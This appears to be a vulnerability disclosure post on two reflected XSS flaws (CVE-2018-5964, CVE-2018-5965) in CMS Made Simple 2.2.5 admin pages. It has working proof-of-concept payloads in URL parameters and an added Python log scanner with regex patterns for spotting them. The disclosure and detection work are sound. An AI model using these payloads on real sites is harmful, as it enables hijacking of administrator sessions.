CVE-2018-5964, CVE-2018-5965
CVE-2018-5964
CMS Made Simple (CMSMS) 2.2.5 has reflected XSS in
/admin/moduleinterface.php?mact=ModuleManager,m1_,defaultadmin,0&_sk_=d07f6f6eb9b1a92a741&m1___activetab=installed&m1___messages=CMSMailer%20module%20has%20been%20successfully%20i
via the m1__messages parameter.
After a module is installed or uninstalled, the page shows a status message taken from the m1_message parameter. Setting the m1_message parameter value to '>"><img src=x onerror=alert(document.domain)> leads to XSS.

CVE-2018-5965
Another parameter through which JavaScript can be executed is shown in this request:
GET /cmsms-2.2.5-install/admin/moduleinterface.php?mact=DesignManager,m1_,defaultadmin,0&_sk_=ba5e56a6aa91ad93f43&m1___activetab=templates&m1___errors=a%27%3E%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
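A defender can look for both requests above in web server logs. The following is an added example, not code from the original post or from CMSMS: it flags requests to admin/moduleinterface.php whose message or error parameter decodes to HTML metacharacters, including double-encoded values. The log lines, the SESSIONKEY placeholder and all function names are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Parameter spellings used on this page (m1_message, m1__messages, m1___messages, m1___errors).
WATCHED = re.compile(r"^m1_+(?:messages?|errors)$")
# Assumption: legitimate status text never needs these characters.
MARKUP = re.compile(r"[<>\"']")
# Request field of a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample log; SESSIONKEY stands in for the _sk_ token.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2018:10:00:00 +0000] "GET /admin/moduleinterface.php?mact=ModuleManager,m1_,defaultadmin,0&_sk_=SESSIONKEY&m1___messages=Module%20installed HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2018:10:00:05 +0000] "GET /cmsms-2.2.5-install/admin/moduleinterface.php?mact=DesignManager,m1_,defaultadmin,0&_sk_=SESSIONKEY&m1___activetab=templates&m1___errors=a%27%3E%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 5301',
    '192.0.2.10 - - [01/Jan/2018:10:00:09 +0000] "GET /admin/moduleinterface.php?_sk_=SESSIONKEY&m1___messages=%253Cb%253E HTTP/1.1" 200 5120',
    '192.0.2.10 - - [01/Jan/2018:10:00:12 +0000] "GET /index.php?m1___errors=%3Cb%3E HTTP/1.1" 200 900',
]

def fully_decode(value, rounds=3):
    """Undo up to `rounds` extra layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(url):
    """Return (name, decoded value) for watched parameters carrying markup."""
    parts = urlsplit(url)
    if not parts.path.endswith("/admin/moduleinterface.php"):
        return []
    found = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = fully_decode(value)
        if WATCHED.match(name) and MARKUP.search(value):
            found.append((name, value))
    return found

def scan(lines):
    """Return (line number, parameter, decoded value) for every hit."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits += [(number, n, v) for n, v in suspicious_params(match.group(1))]
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```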
I read lots of papers and websites about this CMS. They don't give a bounty for using the admin role. So I reported to MITRE and got CVE-2018-5964 and CVE-2018-5965.